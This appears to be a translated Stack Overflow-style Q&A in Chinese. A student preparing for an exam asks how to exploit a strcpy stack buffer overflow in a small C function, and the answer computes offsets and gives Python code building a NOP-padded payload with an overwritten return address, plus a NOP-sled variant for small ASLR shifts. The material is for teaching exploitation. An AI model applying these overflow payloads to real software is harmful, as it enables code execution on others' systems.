0

我下周要复习考试,我遇到了一个过去的问题。

void func(char * arg)
{
     char buf[32];
     strcpy(buf, arg);
}

认为;

  • 根本没有防备
  • buf 从 0xbffebfb0 开始
  • (gdb) x/2wx $ebp 0xbffebfd8: 0xbffec068 0x08048fe1

a) 你想运行一个 24 字节长的有效载荷,应该将哪些字节复制到缓冲区中以进行攻击?(我想为 24 个字节填写 '\x90')

b) 如果启用了 ASLR,每次运行时将堆栈偏移 0-15 个字节,那么什么有效负载(在 python 打印语句中描述)将始终让上面的 shellcode 执行?或者为什么这样的有效载荷是不可能的?

4

1 回答 1

0

a) gdb 的输出与此函数的正常编译不一致:缓冲区顶部与ebp. 但是,0xbffebfd8 - 0xbffebfb00x28(40 字节)。我假设这是不正确的,因为唯一的局部变量是buf.

def hack(payload='\x90'*24):
    filler = 'A'*(32 - len(payload)) # for rest of buffer
    frame_ptr = struct.pack("<I", 0x42424242)
    ret = struct.pack("<I", 0xbffebfb0) # jump to top of buffer
    return payload + filler + frame_ptr + ret + '\0'

b) 如果堆栈值每次变化 0-15 个字节,则需要插入一个 15 字节的 NOP sled。

32(缓冲区长度)+ 4(保存的帧指针)= 36 36 - 15 = 21 字节

这不足以容纳 24 字节的有效负载。如果上面奇怪的 gdb 输出是正确的,那么空间就足够了。

print ("\x90"*15 + # nop sled
       payload +
       'A'*(40 - len(payload) - 15) + # filler
       struct.pack("<I", 0x42424242) + # saved frame pointer
       struct.pack("<I", 0xbffebfb0) + # saved return address
       '\0' )
于 2015-05-13T02:05:19.480 回答